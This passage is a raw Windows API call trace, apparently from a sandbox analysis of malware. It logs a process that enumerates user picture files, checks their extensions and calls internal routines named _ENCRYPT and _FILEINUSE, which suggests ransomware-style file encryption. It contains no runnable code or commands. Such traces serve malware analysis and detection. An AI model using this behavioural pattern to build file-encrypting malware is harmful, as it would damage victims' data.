cchCount2=1) returned 3 [0190.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0190.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.166] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.166] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.166] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.166] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.167] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.167] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.167] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0190.167] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.167] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.167] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0190.167] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2ea3, lpOverlapped=0x0) returned 1 [0190.167] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0190.167] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2ea3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.167] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0190.168] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0190.168] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.169] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0190.169] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.169] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.169] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.169] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.169] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0190.169] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.170] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\upfzg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.171] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.172] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.172] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.172] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0190.172] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.172] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.173] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0190.173] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.173] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0190.173] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.173] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0190.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.174] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0190.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.175] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.175] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.175] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.175] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d69370, ftCreationTime.dwHighDateTime=0x1d5d92b, ftLastAccessTime.dwLowDateTime=0xa1f44280, ftLastAccessTime.dwHighDateTime=0x1d5e558, ftLastWriteTime.dwLowDateTime=0xa1f44280, ftLastWriteTime.dwHighDateTime=0x1d5e558, nFileSizeHigh=0x0, nFileSizeLow=0x4969, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uPfzg.bmp", cAlternateFileName="")) returned 0x90add8 [0190.175] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.176] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, 